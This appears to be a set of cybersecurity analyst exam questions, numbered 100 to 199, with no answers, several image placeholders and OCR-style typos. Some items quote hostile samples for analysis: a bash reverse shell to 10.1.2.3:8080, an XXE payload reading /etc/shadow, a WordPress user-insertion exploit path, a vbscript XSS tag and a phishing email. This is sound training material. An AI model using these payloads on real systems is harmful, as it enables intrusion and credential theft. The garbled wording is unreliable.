QUESTION 100 An organization has the following policy statements: - All emails entering or leaving the organization will be subject to inspection for malware, policy violations, and unauthorized coolant. - All network activity will be logged and monitored. - Confidential data will be tagged and tracked - Confidential data must never be transmitted in an unencrypted form. - Confidential data must never be stored on an unencrypted mobile device. Which of the following is the organization enforcing?

QUESTION 101 A Chief Executive Officer (CEO) is concerned the company will be exposed lo data sovereignty issues as a result of some new privacy regulations to help mitigate this risk. The Chief Information Security Officer (CISO) wants to implement an appropriate technical control. Which of the following would meet the requirement?

QUESTION 102 A security analyst needs to provide the development learn with secure connectivity from the corporate network to a three-tier cloud environment. The developers require access to servers in all three tiers in order to perform various configuration tasks. Which of the following technologies should the analyst implement to provide secure transport?

QUESTION 103 A security analyst found an old version of OpenSSH running on a DMZ server and determined the following piece of code could have led to a command execution through an integer overflow; nresp = packet_get_inf ): if (nresp > 0) ( response = xmalloc (nresp*sizeof (char*) ) : for (i = 0; i < nresp; i++) response [i] = packet_get_string (NULL) ; ) Which of the following controls must be in place to prevent this vulnerability?

QUESTION 104 A cyber-security analyst is implementing a new network configuration on an existing network access layer to prevent possible physical attacks. Which of the following BEST describes a solution that would apply and cause fewer issues during the deployment phase?

QUESTION 105 A security analyst at example.com receives SIEM alert for an IDS signature and reviews the associated packet capture and TCP stream: Packet capture: image*

QUESTION 106 A security analyst needs to provide a copy of a hard drive for forensic analysis. Which of the following would allow the analyst to perform the task?

QUESTION 107 While monitoring the information security notification mailbox, a security analyst notices several emails were reported as spam. Which of the following should the analyst do FIRST?

QUESTION 108 Company A is in the process of merging with Company B. As part of the merger, connectivity between the ERP systems must be established so pertinent financial information can be shared between the two entities. Which of the following will establish a more automated approach to secure data transfers between the two entities?

QUESTION 109 A company has alerted planning the implemented a vulnerability management procedure. However, to security maturity level is low, so there are some prerequisites to complete before risk calculation and prioritization. Which of the following should be completed FIRST?

QUESTION 110 A security learn implemented a SCM as part for its security-monitoring program there is a requirement to integrate a number of sources Into the SIEM to provide better context relative to the events being processed. Which of the following BST describes the result the security learn hopes to accomplish by adding these sources?

QUESTION 111 A security analyst is investigating an incident related to an alert from the threat detection platform on a host (10.0.1.25) in a staging environment that could be running a cryptomining tool because it is sending traffic to an IP address that is related to Bitcoin. The network rules for the instance are the following:

QUESTION 112 An analyst is reviewing the following output as part of an incident:

QUESTION 113 The Chief Information Security Officer (CISO) of a large financial institution is seeking a solution that will block a predetermined set of data points from being transferred or downloaded by employees. The CISO also wants to track the data assets by name, type, content, or data profile. Which of the following BEST describes what the CIS wants to purchase?

QUESTION 114 The majority of a company's employees have stated they are unable to perform their job duties due to outdated workstations, so the company has decided to institute BYOD. Which of the following would a security analyst MOST likely recommend for securing the proposed solution?

QUESTION 115 The help desk is having difficulty keeping up with all onboarding and offboarding requests. Managers often submit, requests for new users at the last minute. causing the help desk to scramble to create accounts across many different Interconnected systems. Which of the following solutions would work BEST to assist the help desk with the onboarding and offboarding process while protecting the company's assets?

QUESTION 116 A security analyst is concerned the number of security incidents being reported has suddenly gone down. Daily business interactions have not changed, and no additional security controls have been implemented. Which of the following should the analyst review FIRST?

QUESTION 117 A developer is working ona program to convert user-generated input in a web form before it is displayed by the browser. This technique is referred to as:

QUESTION 118 A vulnerability scanner has identified an out-of-support database software version running on a server. The software update will take six to nine months to complete. The management team has agreed to a one-year extended support contract with the software vendor. Which of the following BEST describes the risk treatment in this scenario?

QUESTION 119 Which of the following is an advantage of SOAR over SIEM?

QUESTION 120 Which of the following factors would determine the regulations placed on data under data sovereignty laws?

QUESTION 121 An organization's internal department frequently uses a cloud provider to store large amounts of sensitive data. A threat actor has deployed a virtual machine to attack another virtual machine to gain access to the data. Through the use of the cloud host's hypervisor, the threat actor has escalated the access rights. Which of the following actions would be BEST to remediate the vulnerability the attacker has used to exploit the system?

QUESTION 122 An online gaming company was impacted by a ransomware attack. An employee opened an attachment that was received via an SMS attack on a company-issue firewall. Which following actions would help during the forensic analysis of the mobile device? (Choose two.)

image

QUESTION 124 During the threat modeling process for a new application that a company is launching, a security analyst needs to define methods and items to take into consideration. Which of the following are part of a known threat modeling method?

QUESTION 125 A Chief Information Security Officer has asked for a list of hosts that have critical and high- seventy findings as referenced in the CVE database. Which of the following tools would produce the assessment output needed to satisfy this request?

QUESTION 126 An organization wants to implement a privileged access management solution to better manage the use to emergency and privileged service accounts. Which of the following would BEST satisfy the organization's goal?

QUESTION 127 A security analyst is deploying a new application in the environment. The application needs to be integrated with several existing applications that contain SP. Prior to the deployment, the analyst should conduct:

QUESTION 128 A manufacturing company uses a third-party service provider for Tier 1 security support. One of the requirements is that the provider must only source talent from its own country due to geopolitical and national security interests. Which of the following can the manufacturing company implement to ensure the third-party service provider meets this requirement?

QUESTION 129 Which of the following APT adversary archetypes represent non-nation-state threat actors? (Select TWO)

QUESTION 130 A security analyst was transferred to an organization's threat-hunting team to track specific activity throughout the enterprise environment. The analyst must observe and assess the number to times this activity occurs and aggregate the results. Which of the following is the BEST threat-hunting method for the analyst to use?

QUESTION 131 A security officer needs to find the most cost-effective solution to the current data privacy and protection gap found in the last security assessment. Which of the following is the BEST recommendation?

QUESTION 132 An analyst is responding to an incident within a cloud infrastructure. Based on the logs and traffic analysis, the analyst thinks a container has been compromised. Which of the following should the analyst do FIRST?

QUESTION 133 A security analyst sees the following OWASP ZAP output from a scan that was performed against a modern version of Windows while testing for client-side vulnerabilities: Alert Detail Low (Medium) - Web Browser XSs Protection not enabled Description: Web browser XSs protection not enabled, or disabled by the configuration of the HTTP Response header URL: https://domain.com/sun/ray Which of the following is the MOST likely solution to the listed vulnerability?

QUESTION 134 During the security assessment of a new application, a tester attempts to log in to the application but receives the following message incorrect password for given username. Which of the following can the tester recommend to decrease the likelihood that a malicious attacker will receive helpful information?

image

QUESTION 136 During a review of SIEM alerts, a security analyst discovers the SIEM is receiving many alerts per day from the file-integrity monitoring toot about files from a newly deployed application that should not change. Which of the following steps should the analyst complete FIRST to respond to the issue?

QUESTION 137 Which of the following is a difference between SOAR and SCAP?

image

QUESTION 139 A security analyst is reviewing the output of tcpdump to analyze the type of activity on a packet capture: look at image*

image

QUESTION 141 An analyst is responding to an incident involving an attack on a company-owned mobile device that was being used by an employee to collect data from clients in the field. Malware was loaded on the device via the installation of a third-party software package. The analyst has baselined the device. Which of the following should the analyst do to BEST mitigate future attacks?

QUESTION 142 Some hard disks need to be taken as evidence for further analysis during an incident response. Which of the following procedures must be completed FIRST for this type of evidence acquisition?

QUESTION 143 Which of the following is the software development process by which function, usability, and scenarios are tested against a known set of base requirements?

An organization wants to ensure the privacy of the data that is on its systems. Full disk encryption and DLP are already in use. Which of the following is the BEST option?

QUESTION 145 A company wants to configure the environment to allow passive network monitoring. To avoid disrupting the sensitive network, which of the following must be supported by the scanner's NIC to assist with the company's request?

QUESTION 146 Due to a rise in cyber attackers seeking PHI, a healthcare company that collects highly sensitive data from millions of customers is deploying a solution that will ensure the customers' data is protected by the organization internally and externally. Which of the following countermeasures can BEST prevent the loss of customers' sensitive data?

QUESTION 147 A company's security team recently discovered a number of workstations that are at the end of life. The workstation vendor informs the team that the product is no longer supported and patches are no longer available. The company is not prepared to cease its use of these workstations. Which of the following would be the BEST method to protect these workstations from threats?

QUESTION 148 During a review of recent network traffic, an analyst realizes the team has seen this same traffic multiple times in the past three weeks, and it resulted in confirmed malware activity. The analyst also notes there is no other alert in place for this traffic After resolving the security incident, which of the following would be the BEST action for the analyst to take to increase the chance of detecting this traffic in the future?

QUESTION 149 A company uses an FTP server to support its critical business functions. The FTP server is configured as follows: - The FTP service is running with the data directory configured in /opt/ftp/data. -The FTP server hosts employees' home directories in /home. - Employees may store sensitive information in their home irectories. An loC revealed that an FTP directory traversal attack resulted in sensitive data loss. Which of the following should a server administrator implement to reduce the risk of current and future directory traversal attacks targeted at the FTP server?

QUESTION 150 A company offers a hardware security appliance to customers that provides remote administration of a device on the customer's network. Customers are not authorized to alter the configuration. The company deployed a software process to manage unauthorized changes to the appliance log them, and forward them to a central repository for evaluation. Which of the following processes is the company using to ensure the appliance is not altered from its original configured state?

QUESTION 152 A company's legal and accounting teams have decided it would be more cost-effective to offload the risks of data storage toa third party. The IT management team has decided to implement a cloud model and has asked the security team for recommendations. Which of the following will allow all data to be kept on the third-party network?

QUESTION 151 A security analyst is investigating a reported phishing attempt that was received by many users throughout the company. The text of one of the emails is shown below: Return-Path: <security@offl ce365.com > Received: from [122.167.40.119] Message-ID: <FE3638ACA.2020509@offlce365.com> Date: 23 May 2020 11:40:36 -0400 From: security@offl ce365.com MIME-Version: 1.0 To: Paul Vieira <pvieira@company.com> Subject: Account Lockout Content-Type: HTML; Office 365 User, It looks like your account has been locked out. Please click this <a href-"http:/laccountfix-office356.com login. php">link</> and follow the prompts to restore access. Regards, Security Team Due to the size of the company and the high storage requirements, the company does not log DNS requests or perform packet captures of network traffic, but it does log network flow data. Which of the following commands will the analyst most likely execute NEXT?

QUESTION 153 While reviewing web server logs, an analyst notices several entries with the same time stamps, but all contain odd characters in the request line. Which of the following steps should be taken next?

QUESTION 154 A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?

QUESTION 155 A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique?

QUESTION 156 An analyst has received an IPS event notification from the SIEM stating an lP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet: /wp- json/trx addons/V2/get/sc layout?sc=wp insert user&role=administrator Which of the following controls would work best to mitigate the attack represented by this snippet?

QUESTION 157 A penetration tester submited data to a form in a web application, which enabled the penetration tester to retrieve user credentials. Which of the following should be recommended for remediation of this application vulnerability?

QUESTION 158 A cybersecurity team lead is developing metrics to present in the weekly executive briefs.Executives are interested in knowing how long it takes to stop the spread of malware that enters the network. Which of the following metrics should the team lead include in the briefs?

QUESTION 159 An employee accessed a website that caused a device to become infected with invasive malware. The incident response analyst has: - created the initial evidence log. - disabled the wireless adapter on the device. - interviewed the employee, who was unable to identify the website that was accessed. - reviewed the web proxy traffic logs. Which of the following should the analyst do to remediate the infected device?

QUESTION 160 A cloud team received an alert that unauthorized resources were being auto-provisioned. After investigating, the team suspects that cryptomining is occurring. Which of the following indicators would most likely lead the team to this conclusion?

QUESTION 161 A company's security team is updating a section of the reporting policy that pertains to inappropriate use of resources (e.g., an employee who installs cryptominers on workstations in the office). Besides the security team, which of the following groups should the issue be escalated to first in order to comply with industry best practices?

QUESTION 162 Given the following CVSS string: CVSS: 3.0/AV:N/AC: L/ PR: N/UI :N/S:U/C: H/I :H/A:H Which of the following attributes correctly describes this vulnerability?

image*

QUESTION 165 A security analyst must preserve a system hard drive that was involved in a litigation request. Which of the following is the best method to ensure the data on the device is not modified?

image*

QUESTION 166 Which of the following best describes the goal of a tabletop exercise?

QUESTION 167 A virtual web server in a server pool was infected with malware after an analyst used the internet to research a system issue. After the server was rebuilt and added back into the server pool, users reported issues with the website, indicating the site could not be trusted. Which of the following is the most likely cause of the server issue?

QUESTION 168 A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability:

QUESTION 169 A security analyst needs to ensure that systems across the organization are protected based on the sensitivity of the content each system hosts. The analyst is working with the respective system owners to help determine the best methodology that seeks to promote confidentiality, availability, and integrity of the data being hosted. Which of the following should the security analyst perform first to categorize and prioritize the respective systems?

image

QUESTION 171 Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

QUESTION 172 A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place?

QUESTION 173 An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Choose two).

image*

QUESTION 175 A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application: getConnection (database01, "alpha" , "AxTv.127GdCx94 GTd"); Which of the following is the most likely vulnerability in this system?

QUESTION 176 A technician is analyzing output from a popular network mapping tool for a PCl audit: look at image*

QUESTION 177 A managed security service provider is having difficulty retaining talent due to an increasing workload caused by a client doubling the number of devices connected to the network. Which of the following would best aid in decreasing the workload without increasing staff?

QUESTION 178 An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence?

QUESTION 179 An analyst receives threat intelligence regarding potential attacks from an actor with seemingly unlimited time and resources. Which of the following best describes the threat actor attributed to the malicious activity?

QUESTION 180 A systems analyst is limiting user access to system configuration keys and values in a Windows environment. Which of the following describes where the analyst can find these configuration items?

QUESTION 181 While reviewing web server logs, a security analyst found the following line: < IMG SRC='vbscript :msgbox ("test") > Which of the following malicious activities was attempted?

QUESTION 182 A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https:lloffice365password.acme.co. The site's standard VPN logon page is www.acme.com/logon. Which of the following is most likely true?

QUESTION 183 A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration?

QUESTION 184 A security analyst discovers an LFI vulnerability that can be exploited to extract credentials from the underlying host. Which of the following patterns can the security analyst use to search the web server logs for evidence of exploitation of that particular vulnerability?

QUESTION 185 A company is in the process of implementing a vulnerability management program. Which of the following scanning methods should be implemented to minimize the risk of OT/ICS devices malfunctioning due to the vulnerability identification process?

QUESTION 186 A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy?

QUESTION 187 An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?

QUESTION 188 An analyst recommends that an EDR agent collect the source IP address, make a connection to the firewall, and create a policy to block the malicious source IP address across the entire network automatically. Which of the following is the best option to help the analyst implement this recommendation?

QUESTION 189 An end-of-life date was announced for a widely used OS. A business-critical function is performed by some machinery that is controlled by a PC, which is utilizing the OS that is approaching the end-of-life date. Which of the following best describes a security analyst's concern?

QUESTION 190 Which of the following describes the best reason for conducting a root cause analysis?

QUESTION 191 Which of the following concepts is using an API to insert bulk access requests from a file into an identity management system an example of?

QUESTION 192 A SOC analyst recommends adding a layer of defense for all endpoints that will better protect against external threats regardless of the device's operating system. Which of the following best meets this requirement?

QUESTION 193 A security analyst identified the following suspicious entry on the host-based IDS logs: bash -i >& /dev/tcp /10.1.2.3/8080 0>&1 Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

QUESTION 194 A company is concerned with finding sensitive file storage locations that are open to the public. The current internal cloud network is flat. Which of the following is the best solution to secure the network?

QUESTION 195 A security analyst is reviewing the findings of the latest vulnerability report for a company's web application. The web application accepts files for a Bash script to be processed if the files match a given hash. The analyst is able to submit files to the system due to a hash collision. Which of the following should the analyst suggest to mitigate the vulnerability with the fewest changes to the current script and infrastructure ?

QUESTION 196 A security analyst needs to mitigate a known, exploited vulnerability related to an attack vector that embeds software through the USB interface. Which of the following should the analyst do first?

QUESTION 197 A systems administrator receives reports of an internet-accessible Linux server that is running very sluggishly. The administrator examines the server, sees a high amount of memory utilization, and suspects a DoS attack related to half-open TCP sessions consuming memory. Which of the following tools would best help to prove whether this server was experiencing this behavior?

QUESTION 198 A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below: <!--?xml version="1.0" 2--> <!DOCTYPE replace (<!ENTITY ent SYSTEM "File:/IIl letc/shadow">1> <userInfo> <firstName>John</firstName> <lastName> $entry;</lastName> </userInfo> Which of the following vulnerability types is the security analyst validating?

QUESTION 199 Which of the following is the most important factor to ensure accurate incident response reporting?